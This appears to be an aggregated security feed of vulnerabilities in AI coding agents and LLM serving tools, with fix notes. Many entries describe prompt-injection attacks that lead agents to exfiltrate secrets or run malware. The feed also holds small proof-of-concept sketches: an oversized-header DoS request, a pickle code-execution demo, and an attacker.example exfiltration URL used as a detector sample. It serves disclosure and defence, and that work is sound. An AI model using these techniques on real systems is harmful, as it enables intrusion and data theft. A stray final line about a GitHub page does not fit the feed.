All tracked items across vulnerabilities, news, research, incidents, and regulatory updates.
Windsurf Cascade contains a create_memory tool that could enable SpAIware attacks, in which an attacker plants persistent malicious instructions in an AI's long-term memory so that data exfiltration continues across future sessions. The key question is whether creating these memories requires human approval or happens automatically, which determines how easily an attacker could abuse the feature.
Roo Code is an AI tool that automatically writes code inside text editors, but versions before 3.25.5 have a bug in how they parse commands (the instructions telling a computer what to do). An attacker could trick the AI into running extra harmful commands by hiding them in prompts if the user had enabled auto-approved command execution, a risky setting that is off by default.
CVE-2025-48956 is a Denial of Service vulnerability (a type of attack that makes a service unavailable) in vLLM, an inference and serving engine for large language models. Versions 0.1.0 through 0.10.1.0 are vulnerable to crashing when someone sends an HTTP GET request with an extremely large header, which exhausts the server's memory. This attack requires no authentication, so anyone on the internet can trigger it.
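The mechanics of this DoS are simple: HTTP headers must be buffered in memory before they can be parsed, so an unauthenticated client that sends a huge header forces a matching server-side allocation. The sketch below only constructs such a request to show the size relationship; the header name and 1 MiB size are illustrative, not from the advisory.

```python
# Illustrative sketch: an oversized HTTP header translates directly into
# memory the server must hold before it can even parse the request.
# "X-Padding" and the sizes used are illustrative examples.

def build_oversized_request(header_bytes: int) -> bytes:
    """Build a raw HTTP/1.1 GET whose single custom header is header_bytes long."""
    padding = b"A" * header_bytes
    return (
        b"GET / HTTP/1.1\r\n"
        b"Host: vllm-server\r\n"
        b"X-Padding: " + padding + b"\r\n"
        b"\r\n"
    )

request = build_oversized_request(1024 * 1024)
print(len(request))  # just over 1 MiB that the server must buffer; scale up to exhaust RAM
```

In practice, a reverse proxy with a header-size limit in front of the server blocks such requests, but upgrading vLLM (see the fix entry below) addresses the root cause.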
claude-code-router is a tool that directs Claude Code requests to different AI models. The software has a security flaw in its CORS (Cross-Origin Resource Sharing, which controls what websites can access a service) configuration that could allow attackers to steal user API keys (credentials that grant access to services) and sensitive data from untrusted websites.
Windsurf, a code editor based on VS Code with an AI coding agent called Windsurf Cascade, has security vulnerabilities that allow attackers to use prompt injection (tricking an AI by hiding instructions in its input) to steal developer secrets from a user's machine. The vulnerabilities were responsibly reported to Windsurf on May 30, 2025, but the company has not provided updates on fixes despite follow-up inquiries.
Amazon Q Developer for VS Code, a coding tool used by over 1 million people, has a vulnerability where attackers can use invisible Unicode characters (special characters that humans cannot see but the AI can read) to trick the AI into following hidden instructions, potentially stealing sensitive information or running malicious code on a user's computer.
Amazon Q Developer, a popular VS Code extension for coding assistance with over 1 million downloads, is vulnerable to indirect prompt injection (tricking an AI by hiding malicious instructions in its input data). This vulnerability allows an attacker or the AI itself to run arbitrary commands on a developer's computer without permission, similar to a flaw that Microsoft patched in GitHub Copilot.
A vulnerability in the Linux kernel's AMD SEV-SNP (Secure Encrypted Virtualization with Secure Nested Paging, a feature that isolates virtual machine memory) could allow cache coherency issues when memory is marked as private. The fix involves touching the first and last byte of each 4K page (a memory unit) during validation when a specific CPU flag indicates the vulnerability exists.
Volcengine's verl 3.0.0 has a deserialization vulnerability (unsafe loading of data structures from untrusted files) in its model_merger.py script that uses torch.load() with weights_only=False, allowing attackers to execute arbitrary code (run commands without authorization) if a victim loads a malicious model file. An attacker can exploit this by tricking a user into downloading and using a specially crafted .pt file, potentially gaining full control of the victim's system.
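The reason weights_only=False is dangerous is that torch.load then falls back to Python's pickle, and unpickling can invoke arbitrary callables via the __reduce__ protocol. This stdlib-only sketch stands in for a malicious .pt file; the class and the harmless len() payload are illustrative (a real exploit would call something like os.system):

```python
# Why untrusted deserialization means code execution: pickle.loads calls
# whatever callable __reduce__ names, purely as a side effect of loading data.
import pickle

class Malicious:
    def __reduce__(self):
        # On unpickling, pickle invokes the returned callable with these args.
        # A real payload would be (os.system, ("malicious command",)).
        return (len, ("pwned-by-pickle",))

blob = pickle.dumps(Malicious())   # stands in for a crafted .pt file
result = pickle.loads(blob)        # a function call happens during "loading"
print(result)  # 15: len() was executed just by deserializing
```

The safe pattern is torch.load(path, weights_only=True), which restricts deserialization to tensor data and rejects payloads like this.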
Amazon Q Developer, a popular VS Code coding agent with over 1 million downloads, has a high-severity vulnerability where it can leak sensitive information like API keys to external servers through DNS requests (the system that translates website names into IP addresses). Attackers can trigger this behavior with prompt injection (tricking the AI by hiding malicious instructions in its input), especially via untrusted data, because the tool's security relies heavily on how the AI model behaves rather than on enforced technical controls.
A vulnerability in Amp Code from Sourcegraph allowed attackers to steal sensitive information by using prompt injection (tricking an AI by hiding instructions in its input) through markdown image rendering, which could force the AI to send previous chat data to attacker-controlled websites. This type of vulnerability is common in AI applications and similar to one previously found in GitHub Copilot. The vulnerability has been fixed in Amp Code.
Claude Code is a tool that lets AI assistants write and run code on your computer. Before version 1.0.4, attackers could trick the tool into reading files and sending their contents over the internet without asking you first, because the tool's list of pre-approved commands was too broad. Exploitation requires the attacker to insert malicious instructions into the conversation with Claude Code.
NVIDIA Merlin Transformers4Rec contains a vulnerability in one of its Python dependencies that allows attackers to inject malicious code (code injection, where an attacker inserts unauthorized commands into a program). A successful attack could lead to code execution (running unauthorized commands on a system), privilege escalation (gaining higher-level access rights), information disclosure (exposing sensitive data), and data tampering (unauthorized modification of data).
GitHub Copilot and VS Code are vulnerable to prompt injection (tricking an AI by hiding instructions in its input) that allows an attacker to achieve RCE (remote code execution, where an attacker can run commands on a system they don't own) by modifying a project's settings.json file to put Copilot into 'YOLO mode'. This vulnerability demonstrates a broader security risk: if an AI agent can write to files and modify its own configuration or security settings, it can be exploited for full system compromise.
Fix: Update to version 3.25.5, which resolves the issue.
(Source: NVD/CVE Database)
Fix: This vulnerability is fixed in vLLM version 0.10.1.1. Users should upgrade to this version or later.
(Source: NVD/CVE Database)
Fix: The issue has been patched in v1.0.34.
(Source: NVD/CVE Database)
Fix: Implement a cache line eviction mitigation by touching the first and last byte of each 4K page being validated when changing page state to private. The mitigation should be invoked when validating memory and when the COHERENCY_SFW_NO CPUID bit (a CPU feature flag) is not set, indicating the SNP guest is vulnerable. No mitigation is needed when performing a page state change to shared and rescinding validation.
(Source: NVD/CVE Database)
Sourcegraph's Amp coding agent was vulnerable to invisible prompt injection (hidden instructions embedded in text that AI models interpret as commands). Attackers could use invisible Unicode Tag characters to trick the AI into dumping environment variables and exfiltrating secrets through URLs. The vulnerability has been fixed in the latest version.
Fix: According to the source, Sourcegraph addressed the vulnerability by "sanitizing the input." The source also recommends that developers: strip or neutralize Unicode Tag characters before processing input, add visual and technical safeguards against invisible prompts, include automated detection of suspicious Unicode usage in prompt injection monitors, implement human-in-the-loop approval before navigating to untrusted third-party domains, and mitigate downstream data exfiltration vulnerabilities.
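The first recommendation above, stripping or neutralizing Unicode Tag characters before processing input, can be sketched in a few lines. Tag characters live in the block U+E0000 through U+E007F; the helper names below are illustrative:

```python
# Detect and strip invisible Unicode Tag characters (U+E0000-U+E007F),
# the code points used to smuggle instructions past human reviewers.

TAG_RANGE = range(0xE0000, 0xE0080)

def contains_tag_chars(text: str) -> bool:
    return any(ord(ch) in TAG_RANGE for ch in text)

def strip_tag_chars(text: str) -> str:
    return "".join(ch for ch in text if ord(ch) not in TAG_RANGE)

# A hidden payload ("hi" re-encoded as Tag characters) appended to benign text:
hidden = "review this code" + "".join(chr(0xE0000 + ord(c)) for c in "hi")
assert contains_tag_chars(hidden)   # invisible to a human, present to a model
print(strip_tag_chars(hidden))      # "review this code"
```

Detection (flagging and alerting) is often preferable to silent stripping in a prompt injection monitor, since the presence of Tag characters is itself a strong signal of attempted abuse.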
(Source: Embrace The Red)
Fix: Update to version 1.0.4 or later. The source states: 'Users on standard Claude Code auto-update received this fix automatically after release' and 'versions prior to 1.0.24 are deprecated and have been forced to update.'
(Source: NVD/CVE Database)
This content discusses security challenges in agentic AI systems (AI agents that can take actions autonomously), highlighting that generic jailbreak testing (attempts to trick AI into bypassing safety rules) misses real risks like tool misuse and data theft. The article emphasizes the need for contextual red teaming (security testing that simulates realistic attacks in specific business contexts) to properly protect AI agents in enterprise environments.
Google's Gemini AI models, including the Jules product, are vulnerable to invisible prompt injection (tricking an AI by hiding instructions in its input using invisible Unicode characters that the AI interprets as commands). This vulnerability was reported to Google over a year ago but remains unfixed at the model and API (application programming interface, the interface developers use to access the AI) level, affecting all applications built on Gemini, including Google's own products.
Jules, a coding agent, is vulnerable to prompt injection (tricking an AI by hiding malicious instructions in its input) attacks that can lead to remote command and control compromise. An attacker can embed malicious instructions in GitHub issues to trick Jules into downloading and executing malware, giving attackers full control of the system. The attack works because Jules has unrestricted internet access and automatically approves plans after a time delay without requiring human confirmation.
Fix: The source explicitly recommends four mitigations: (1) 'Be careful when directly tasking Jules to work with untrusted data (e.g. GitHub issues that are not from trusted sources, or websites with documentation that does not belong to the organization, etc.)'; (2) 'do not have Jules work on private, important, source code or give it access to production-level secrets, or anything that could enable an adversary to perform lateral movement'; (3) deploy 'monitoring and detection tools on these systems' to 'enable security teams to monitor and understand potentially malicious behavior'; and (4) 'do not allow arbitrary Internet access by default. Instead, allow the configuration to be enabled when needed.'
(Source: Embrace The Red)
Google Jules, an asynchronous coding agent (a tool that automatically writes and manages code tasks), has multiple security vulnerabilities that allow attackers to steal data through prompt injection (tricking the AI by hiding malicious instructions in its input). Attackers can exploit two main exfiltration vectors: using markdown image rendering to leak information to external servers, and abusing the view_text_website tool (which fetches and reads web pages) to read files and send them to attacker-controlled servers, often by planting malicious instructions in GitHub issues.
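One mitigation for the markdown-image exfiltration vector described above is to scan agent output before rendering it and flag image URLs pointing anywhere other than trusted hosts, since an injected agent can encode secrets into the query string of an attacker-controlled image URL. A minimal sketch; the allowlist and regex are illustrative, not from the source:

```python
# Flag markdown image URLs whose host is not on an allowlist, so a renderer
# can refuse to fetch them (fetching is what leaks the encoded secret).
import re
from urllib.parse import urlparse

ALLOWED_IMAGE_HOSTS = {"github.com", "raw.githubusercontent.com"}  # illustrative

MD_IMAGE = re.compile(r"!\[[^\]]*\]\(([^)\s]+)\)")

def suspicious_image_urls(markdown: str) -> list[str]:
    """Return markdown image URLs whose host is not explicitly trusted."""
    return [
        url for url in MD_IMAGE.findall(markdown)
        if urlparse(url).hostname not in ALLOWED_IMAGE_HOSTS
    ]

leaky = "Done! ![status](https://attacker.example/log?secret=AKIA123)"
print(suspicious_image_urls(leaky))  # ['https://attacker.example/log?secret=AKIA123']
```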
N/A -- This content is a navigation menu and feature listing from GitHub's Release 4.9.1 page, not a description of a security issue, vulnerability, or AI/LLM problem.